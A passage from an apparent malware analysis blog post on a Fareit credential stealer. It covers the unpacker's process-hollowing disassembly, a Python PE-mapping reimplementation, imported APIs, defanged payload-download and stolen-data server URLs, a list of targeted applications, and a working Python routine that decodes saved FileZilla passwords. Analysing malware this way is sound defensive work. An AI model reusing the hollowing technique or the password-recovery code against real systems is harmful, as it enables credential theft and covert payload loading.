seg000:00000155 add ecx, [ecx+3Ch]
seg000:00000158 lea edi, [ecx+18h]
seg000:0000015B mov edx, [edi+20h]
seg000:0000015E movzx eax, word ptr [ecx+14h]
seg000:00000162 add edi, eax
seg000:00000164 movzx ecx, word ptr [ecx+6]
seg000:00000168 loc_168:
seg000:00000168 pusha ; section
seg000:00000169 mov eax, [edi+14h]
seg000:0000016C test eax, eax
seg000:0000016E jz short loc_1B1
seg000:00000170 mov eax, [edi+8]
seg000:00000173 test eax, eax
seg000:00000175 jz short loc_1B1
seg000:00000177 call sizealign
seg000:0000017C mov ecx, eax
seg000:0000017E mov eax, [edi+24h]
seg000:00000181 call sub_42A
seg000:00000186 add esi, [edi+14h]
seg000:00000189 push dword ptr [edi+10h]
seg000:0000018C mov edi, [edi+0Ch]
seg000:0000018F add edi, ebx
seg000:00000191 pop ebx
seg000:00000192 push eax
seg000:00000193 mov edx, esp
seg000:00000195 push edx
seg000:00000196 push eax
seg000:00000197 push ecx
seg000:00000198 push edi
seg000:00000199 push ecx
seg000:0000019A push edx
seg000:0000019B push 4
seg000:0000019D push ecx
seg000:0000019E push edi
seg000:0000019F call dword ptr [ebp+0Ch] ; VirtualProtect for write
seg000:000001A2 pop ecx
seg000:000001A3 xor eax, eax
seg000:000001A5 push edi
seg000:000001A6 rep stosb
seg000:000001A8 pop edi
seg000:000001A9 mov ecx, ebx
seg000:000001AB rep movsb ; copy data
seg000:000001AD call dword ptr [ebp+0Ch] ; VirtualProtect for read only
seg000:000001B0 pop eax
seg000:000001B1 loc_1B1:
seg000:000001B1 popa
seg000:000001B2 add edi, 28h ; '('
seg000:000001B5 loop loc_168 ; rerun to all sections
</pre>
<br />
<br />
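To make the header offsets dereferenced in the loop above concrete, here is an added Python example (my code, not the malware's) that reads the same fields and performs the same per-section layout, as an analyst would to rebuild the in-memory image of a dumped payload. The two-section PE it operates on is constructed, the field names are mine, and clamping the copy length to the aligned section span is an added safety check the original code does not have; the entry point and IMAGE_FILE_DLL flag it parses are the same fields the later PEB update relies on.

```python
import struct

SECTION_HEADER_SIZE = 0x28   # sizeof(IMAGE_SECTION_HEADER); the loop does add edi, 28h
IMAGE_FILE_DLL = 0x2000      # tested against FileHeader.Characteristics ([ecx+16h])


def align_up(value, alignment):
    """Round value up to a multiple of alignment (what 'sizealign' does)."""
    return (value + alignment - 1) // alignment * alignment


def parse_headers(pe):
    """Read exactly the header fields the unpacker's loop dereferences."""
    nt = struct.unpack_from("<I", pe, 0x3C)[0]                   # [esi+3Ch]  e_lfanew
    if pe[nt:nt + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", pe, nt + 0x06)[0]    # [ecx+6]
    size_opt = struct.unpack_from("<H", pe, nt + 0x14)[0]        # [ecx+14h]
    file_chars = struct.unpack_from("<H", pe, nt + 0x16)[0]      # [ecx+16h]
    opt = nt + 0x18                                              # lea edi, [ecx+18h]
    entry_rva = struct.unpack_from("<I", pe, opt + 0x10)[0]      # [ecx+28h] AddressOfEntryPoint
    image_base = struct.unpack_from("<I", pe, opt + 0x1C)[0]
    section_align = struct.unpack_from("<I", pe, opt + 0x20)[0]  # [edi+20h]
    size_of_image = struct.unpack_from("<I", pe, opt + 0x38)[0]
    size_of_headers = struct.unpack_from("<I", pe, opt + 0x3C)[0]
    sections = []
    for i in range(num_sections):
        off = opt + size_opt + i * SECTION_HEADER_SIZE           # add edi, eax (SizeOfOptionalHeader)
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        sections.append({
            "name": pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,        # [edi+8]
            "virtual_address": va,        # [edi+0Ch]
            "raw_size": raw_size,         # [edi+10h]
            "raw_ptr": raw_ptr,           # [edi+14h]
            "characteristics": struct.unpack_from("<I", pe, off + 0x24)[0],  # [edi+24h]
        })
    return {"entry_point": entry_rva, "image_base": image_base,
            "is_dll": bool(file_chars & IMAGE_FILE_DLL), "section_align": section_align,
            "size_of_image": size_of_image, "size_of_headers": size_of_headers,
            "sections": sections}


def map_image(pe):
    """Lay the file out as it would be in memory: headers, then each section at its RVA."""
    h = parse_headers(pe)
    image = bytearray(h["size_of_image"])
    image[:h["size_of_headers"]] = pe[:h["size_of_headers"]]   # the headers copy (512 bytes above)
    for s in h["sections"]:
        if s["raw_ptr"] == 0 or s["virtual_size"] == 0:          # the two jz short loc_1B1 checks
            continue
        span = align_up(s["virtual_size"], h["section_align"])   # call sizealign
        dst = s["virtual_address"]
        if dst + span > len(image):
            raise ValueError("section %s lies outside SizeOfImage" % s["name"])
        image[dst:dst + span] = bytes(span)                      # rep stosb (zero-fill)
        # The unpacker copies SizeOfRawData bytes unconditionally; clamping to the
        # aligned span and to the file length is an added check, not in the original.
        chunk = pe[s["raw_ptr"]:s["raw_ptr"] + min(s["raw_size"], span)]
        image[dst:dst + len(chunk)] = chunk                      # rep movsb
    return image, h


def build_sample_pe():
    """Constructed two-section PE32 (not the sample's embedded payload)."""
    text = b"\x31\xc0\xc3"              # xor eax, eax ; ret
    data = b"Hello from .data\0"
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                      # e_lfanew
    nt, opt = 0x40, 0x40 + 0x18
    hdr[nt:nt + 4] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, nt + 4, 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)  # FileHeader
    struct.pack_into("<H", hdr, opt, 0x10B)                      # PE32 magic
    for off, val in ((0x10, 0x1000), (0x1C, 0x400000), (0x20, 0x1000), (0x24, 0x200),
                     (0x38, 0x3000), (0x3C, 0x200)):             # EP, base, aligns, sizes
        struct.pack_into("<I", hdr, opt + off, val)
    first = opt + 0xE0
    for off, name, vsize, va, raw_ptr, chars in (
            (first, b".text", len(text), 0x1000, 0x200, 0x60000020),
            (first + 0x28, b".data", len(data), 0x2000, 0x400, 0xC0000040)):
        hdr[off:off + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIII", hdr, off + 8, vsize, va, 0x200, raw_ptr)
        struct.pack_into("<I", hdr, off + 0x24, chars)
    return bytes(hdr) + text.ljust(0x200, b"\0") + data.ljust(0x200, b"\0")
```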
It then resolves the imports listed in the new PE's import table, which results in these APIs:
<br />
<br />
<pre class="brush: text">
CPU Dump
Address Value Comments
0041828C 756ACA6E ; kernel32.CreateFileA
00418290 756A1856 ; kernel32.ReadFile
00418294 756A13D0 ; kernel32.CloseHandle
00418298 756A1262 ; kernel32.WriteFile
0041829C 756B9A09 ; kernel32.lstrlenA
004182A0 756BA337 ; kernel32.GlobalLock
004182A4 756BA272 ; kernel32.GlobalUnlock
004182A8 756A4114 ; kernel32.LocalFree
004182AC 756A1A39 ; kernel32.LocalAlloc
004182B0 756A10FC ; kernel32.GetTickCount
004182B4 756C28B1 ; kernel32.lstrcpy
004182B8 756C2951 ; kernel32.lstrcat
004182BC 756ACABC ; kernel32.GetFileAttributesA
004182C0 756BDC78 ; kernel32.ExpandEnvironmentStringsA
004182C4 756A1AE2 ; kernel32.GetFileSize
004182C8 756ABDC0 ; kernel32.CreateFileMappingA
004182CC 756A1A75 ; kernel32.MapViewOfFile
004182D0 756A156F ; kernel32.UnmapViewOfFile
004182D4 756A4BC6 ; kernel32.LoadLibraryA
004182D8 756A1202 ; kernel32.GetProcAddress
004182DC 756C2B74 ; kernel32.GetTempPathA
004182E0 756C2909 ; kernel32.CreateDirectoryA
004182E4 756ACAEC ; kernel32.DeleteFileA
004182E8 756A1568 ; kernel32.GetCurrentProcess
004182EC 756A16B3 ; kernel32.WideCharToMultiByte
004182F0 756A11B0 ; kernel32.GetLastError
004182F4 756BDC90 ; kernel32.lstrcmp
004182F8 756C9597 ; kernel32.CreateToolhelp32Snapshot
004182FC 756C778B ; kernel32.Process32First
00418300 756A1B12 ; kernel32.OpenProcess
00418304 756C7549 ; kernel32.Process32Next
00418308 756ADDDC ; kernel32.FindFirstFileA
0041830C 756B99B3 ; kernel32.lstrcmpi
00418310 756C2921 ; kernel32.FindNextFileA
00418314 756A32CD ; kernel32.FindClose
00418318 756A1225 ; kernel32.GetModuleHandleA
0041831C 756A1EDC ; kernel32.GetVersionExA
00418320 756BD889 ; kernel32.GetLocaleInfoA
00418324 756A4D3F ; kernel32.GetSystemInfo
00418328 756C29CF ; kernel32.GetWindowsDirectoryA
0041832C 756AE6A7 ; kernel32.GetPrivateProfileStringA
00418330 756B9562 ; kernel32.SetCurrentDirectoryA
00418334 7571A3B1 ; kernel32.GetPrivateProfileSectionNamesA
00418338 756CBF8B ; kernel32.GetPrivateProfileIntA
0041833C 756CC45E ; kernel32.GetCurrentDirectoryA
00418340 756A16A6 ; kernel32.lstrlenW
00418344 756A1AA5 ; kernel32.MultiByteToWideChar
00418348 756A10EF ; kernel32.Sleep
0041834C 756A14FA ; kernel32.GetModuleFileNameA
00418350 756CB4FB ; kernel32.LCMapStringA
00418354 756A734E ; kernel32.ExitProcess
00418358 756AD03C ; kernel32.SetUnhandledExceptionFilter
00418360 762A2404 ; ole32.CreateStreamOnHGlobal
00418364 762A3ECA ; ole32.GetHGlobalFromStream
00418368 762C10DD ; ole32.CoCreateGuid
0041836C 762D4003 ; ole32.CoTaskMemFree
00418370 762D57FC ; ole32.CoCreateInstance
00418374 7629EF0B ; ole32.OleInitialize
0041837C 75FAAF26 ; USER32.wsprintfA
00418384 7746BC0D ; ADVAPI32.RegOpenKeyExA
00418388 7746BC25 ; ADVAPI32.RegQueryValueExA
0041838C 7746BED4 ; ADVAPI32.RegCloseKey
00418390 7745D2ED ; ADVAPI32.RegOpenKeyA
00418394 77461B89 ; ADVAPI32.RegEnumKeyExA
00418398 7745D3C1 ; ADVAPI32.RegCreateKeyA
0041839C 77461B96 ; ADVAPI32.RegSetValueExA
004183A0 7746BEE4 ; ADVAPI32.IsTextUnicode
004183A4 77462EBA ; ADVAPI32.RegOpenCurrentUser
004183A8 7745D539 ; ADVAPI32.RegEnumValueA
004183AC 7745E504 ; ADVAPI32.GetUserNameA
004183B4 766A9BA5 ; shell32.ShellExecuteA
004183BC 76090EA5 ; wininet.InternetCrackUrlA
004183C0 7609B636 ; wininet.InternetCreateUrlA
004183C8 75E5DAFE ; SHLWAPI.StrStrIA
004183CC 75E8C64B ; SHLWAPI.StrRChrIA
004183D0 75E5BF27 ; SHLWAPI.StrToIntA
004183D4 75E5CDB6 ; SHLWAPI.StrStrA
004183D8 75E5DB5A ; SHLWAPI.StrCmpNIA
004183DC 75E649E1 ; SHLWAPI.StrStrIW
004183E4 770DE846 ; urlmon.ObtainUserAgentString
004183EC 75563234 ; WS2_32.inet_addr
004183F0 75577133 ; WS2_32.gethostbyname
004183F4 75563F00 ; WS2_32.socket
004183F8 755648BE ; WS2_32.connect
004183FC 75563BED ; WS2_32.closesocket
00418400 7556C4C8 ; WS2_32.send
00418404 75564981 ; WS2_32.select
00418408 719F17A8 ; wsock32.recv
0041840C 719F18E0 ; wsock32.setsockopt
00418410 7556C0FB ; WS2_32.WSAStartup
00418418 7389D1F9 ; userenv.LoadUserProfileA
0041841C 73893F0D ; userenv.UnloadUserProfile
</pre>
<br />
<br />
Since the running process has been replaced by a new PE file, some information in its Process Environment Block (PEB) must be updated, such as the entry point and the image base.
<br />
<br />
<pre class="brush: asm">
seg000:000001D4 push dword ptr fs:30h
seg000:000001DB pop eax
seg000:000001DC mov eax, [eax+0Ch]
seg000:000001DF mov eax, [eax+0Ch]
seg000:000001E2 loc_1E2:
seg000:000001E2 cmp [eax+18h], ebx
seg000:000001E5 jz short loc_1EB
seg000:000001E7 mov eax, [eax]
seg000:000001E9 jmp short loc_1E2
seg000:000001EB loc_1EB:
seg000:000001EB mov ecx, [esp]
seg000:000001EE add ecx, [ecx+3Ch]
seg000:000001F1 mov esi, [ecx+28h]
seg000:000001F4 add esi, edi
seg000:000001F6 mov [eax+18h], edi
seg000:000001F9 mov [eax+1Ch], esi
seg000:000001FC test word ptr [ecx+16h], 2000h
seg000:00000202 jnz short loc_210
seg000:00000204 mov eax, dword ptr fs:18h
seg000:0000020A mov eax, [eax+30h]
seg000:0000020D mov [eax+8], edi ; update entry point in PEB
</pre>
<br />
<br />
It then returns to the modified process image, starting at the new entry point.
<br />
<br />
<pre class="brush: asm">
seg000:0000021A mov [esp+1Ch], esi ; sets up at 0x1c where [esp] gets to be entry point
seg000:0000021E popa
seg000:0000021F push eax
seg000:00000220 call callnextline2
seg000:00000225 pop eax
seg000:00000226 cmp dword ptr [eax+64h], 200h
seg000:0000022D jnz short loc_23E
seg000:0000022F mov eax, [esp]
seg000:00000232 mov dword ptr [esp], 0
seg000:00000239 push dword ptr [esp+4]
seg000:0000023D push eax ; transfer control to new PE entry point
seg000:0000023E loc_23E:
seg000:0000023E xor eax, eax
seg000:00000240 retn
</pre>
<br />
<br />
<b>Still Fareit</b>
<br />
A simple binary comparison shows that this is a Fareit variant almost identical to the one analyzed at <a href="http://thecyberdung.blogspot.com/2013/02/developing-fareit-still-steals-your.html">http://thecyberdung.blogspot.com/2013/02/developing-fareit-still-steals-your.html</a>. Here are some of the highlighted differences:
<br />
* Malware download sites (possibly serving updated variants):
<br />
<br />
<pre class="brush: asm">
.data:004140CD aHttpMissionsea db 'h00p://Missionsearchjobs.com/D5F7G.exe',0
.data:004140F4 aHttpBetterback db 'h00p://betterbacksystems.com/kvq.exe',0
.data:00414119 aHttpWww_printd db 'h00p://www.printdirectadvertising.com/vfMJH.exe',0
.data:00414149 aHttpS381195155 db 'h00p://S381195155.onlinehome.us/vmkCQg8N.exe',0
</pre>
At the time of writing, h00p://Missionsearchjobs.com/D5F7G.exe and h00p://S381195155.onlinehome.us/vmkCQg8N.exe were the only ones still up; both served the same file, with MD5 060260f668ce9f0b6d8c75c2893f3796.
<br />
<br />
* Servers it sends stolen information to and receives updates from:
<br />
<br />
<pre class="brush: asm">
.data:0041400C aHttpGuterprote db 'h00p://guterprotectionperfection.com/ponyb/gate.php',0
.data:00414040 aHttpGuterprova db 'h00p://guterprova.com/ponyb/gate.php',0
.data:00414065 aHttpGutterglov db 'h00p://gutterglovegutterprotection.com/ponyb/gate.php',0
.data:0041409B aHttpGutterguar db 'h00p://gutterguardbuyersguide.com/ponyb/gate.php',0
</pre>
<br />
<br />
* The password list it uses for brute forcing.
<br />
<br />
<br />
<br />
* What does it steal?
<br />
<br />
Similar to the previous variants, it steals stored credentials from a range of applications, most of them FTP clients. A further web search turned up a NoPaste item, dated April 21, 2013, titled <b>; Password recovery modules</b> at <a href="http://nopaste.me/paste/164967415851741239b4ee8">http://nopaste.me/paste/164967415851741239b4ee8</a>. It appears to be the source of the credential-gathering module, written in assembly language. The user who pasted it is not identified. The module's source is quite descriptive and lists these target applications:
<br />
<ul>
<li>Common System Information</li>
<li>FAR/FAR2/FAR3 built-in ftp client</li>
<li>Windows/Total Commander built-in ftp client</li>
<li>Ipswitch WS_FTP client</li>
<li>CuteFTP</li>
<li>FlashFXP</li>
<li>FileZilla</li>
<li>FTP Commander</li>
<li>BulletProof FTP</li>
<li>SmartFTP 2.x-4.x</li>
<li>TurboFTP</li>
<li>FFFTP</li>
<li>CoffeeCupFTP</li>
<li>CoreFTP</li>
<li>FTP Explorer</li>
<li>Frigate3 FTP</li>
<li>SecureFX 6.6</li>
<li>UltraFXP 1.7</li>
<li>FTPRush 2.1.4, 2.1.5</li>
<li>WebSitePublisher 2.1.5</li>
<li>BitKinex 3.2.3</li>
<li>ExpanDrive 1.8.4</li>
<li>ClassicFTP 2.14</li>
<li>Fling 2.23</li>
<li>SoftX 3.3</li>
<li>Directory Opus 9.5.6.0.3937 (64-bit)</li>
<li>CoffeeCup FreeFTP 4.3 / DirectFTP</li>
<li>LeapFTP 2.6.2.470, 3.1.0.50</li>
<li>WinSCP 4.3.2 (Build 1201)</li>
<li>32bit FTP 11.07.01</li>
<li>NetDrive 1.2.0.4</li>
<li>WebDrive 9.16 (build 2385) 64-bit</li>
<li>FTP Control 4.5.0.0</li>
<li>Opera 6.x - 11.x</li>
<li>WiseFTP 1.x - 7.x</li>
<li>FTP Voyager 11.x-15.x</li>
<li>Mozilla Firefox 0.x-5.x</li>
<li>Mozilla Firefox FireFTP addon</li>
<li>Mozilla SeaMonkey 1.x-2.x</li>
<li>Mozilla Flock 1.x-2.x</li>
<li>Mozilla Suite Browser 1.x</li>
<li>LeechFTP 1.3</li>
<li>Odin Secure FTP Expert</li>
<li>WinFTP</li>
<li>FTP Surfer 1.0.7</li>
<li>FTPGetter 3</li>
<li>ALFTP 5</li>
<li>IE 4-9</li>
<li>Dreamweaver CS5</li>
<li>DeluxeFTP 6</li>
<li>Google Chrome</li>
<li>Chromium & SRWare Iron</li>
<li>ChromePlus</li>
<li>Bromium (Yandex Chrome)</li>
<li>Nichrome</li>
<li>Comodo Dragon</li>
<li>RockMelt</li>
<li>K-Meleon</li>
<li>Epic</li>
<li>StaffFTP</li>
<li>AceFTP 3</li>
<li>Global Downloader</li>
<li>FreshFTP</li>
<li>BlazeFTP</li>
<li>NetFile</li>
<li>GoFTP</li>
<li>3D-FTP</li>
<li>EasyFTP</li>
<li>XFTP</li>
<li>RDP (Windows Remote Desktop Connections)</li>
<li>FTP Now</li>
<li>Robo-FTP</li>
<li>Certificate Grabber</li>
<li>LinasFTP</li>
<li>Cyberduck</li>
<li>Putty (Russian version)</li>
<li>Notepad++ (NppFTP plugin)</li>
<li>CoffeeCup Visual Site Designer</li>
<li>FTPShell</li>
<li>FTPInfo</li>
<li>NexusFile</li>
<li>FastStone Browser</li>
<li>CoolNovo</li>
<li>WinZip (built-in FTP backup settings)</li>
<li>Yandex.Internet</li>
<li>MyFTP</li>
<li>sherrod FTP</li>
<li>NovaFTP</li>
<li>Common Windows Mail decryption code</li>
<li>Windows Live Mail</li>
<li>Windows Mail</li>
<li>Becky!</li>
<li>Pocomail</li>
<li>IncrediMail</li>
<li>The Bat!</li>
<li>Outlook</li>
<li>Thunderbird</li>
<li>FastTrackFTP</li>
</ul>
<br />
<br />
Fareit has been around for about two years now, as I recall, probably stealing the same stored credentials the whole time. It is now targeting clients of Bank of America using the same old technique, social engineering. Hopefully the authors of these applications will change how they store user credentials so that a process running as the user can no longer recover them in the clear.
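To show why a stealer like this needs no exploit at all, here is an added example (written for this post, not code from the sample or from the pasted module) that reads the site store of one of the listed targets, FileZilla. FileZilla 3 keeps saved sites in sitemanager.xml under the user's application-data directory; the password is either plain text in <Pass> (older releases) or base64 in <Pass encoding="base64">, and neither form uses a secret key. The XML below is a constructed sample in that shape with made-up hosts, users and passwords. Newer FileZilla releases can protect the store with a master password; this example covers the unprotected format, which is what a stealer of this era reads.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample in the shape of a FileZilla 3 sitemanager.xml:
# one old-style plain-text entry, one base64 entry, and one entry that has
# no <Pass> element at all (e.g. key-file logon). All values are made up.
SAMPLE_SITEMANAGER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.7.3" platform="windows">
  <Servers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>webmaster</User>
      <Pass>Summer2013!</Pass>
      <Logontype>1</Logontype>
      <Name>Old plain-text entry</Name>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
      <Name>Newer base64 entry</Name>
    </Server>
    <Server>
      <Host>keys.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>ops</User>
      <Name>Entry without a stored password</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def decode_pass(pass_elem):
    """Return the stored password as clear text, or None if none is stored.

    FileZilla 3 writes either <Pass>clear</Pass> or
    <Pass encoding="base64">...</Pass>. Base64 is an encoding, not
    encryption, so recovery needs no key or user interaction.
    """
    if pass_elem is None or pass_elem.text is None:
        return None
    if pass_elem.get("encoding") == "base64":
        return base64.b64decode(pass_elem.text).decode("utf-8")
    return pass_elem.text


def recover_sites(xml_text):
    """Parse sitemanager.xml content into a list of site dictionaries."""
    root = ET.fromstring(xml_text)
    sites = []
    for server in root.iter("Server"):
        sites.append({
            "name": server.findtext("Name"),
            "host": server.findtext("Host"),
            "port": int(server.findtext("Port", "21")),
            "user": server.findtext("User"),
            "password": decode_pass(server.find("Pass")),
        })
    return sites


if __name__ == "__main__":
    # On a real host you would read the file from the user's profile instead
    # of the embedded sample (the exact path is outside this example).
    for site in recover_sites(SAMPLE_SITEMANAGER_XML):
        print(site)
```

Every entry with a saved password comes back in the clear, which is exactly the property the stealer relies on; the same holds for most of the other clients in the list above, each with its own file or registry location and its own trivial encoding.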
<br />
Fareit gets past scanners by changing its appearance with every variant, using techniques such as code obfuscation and encryption to hide the real code beneath.
<br />
<br />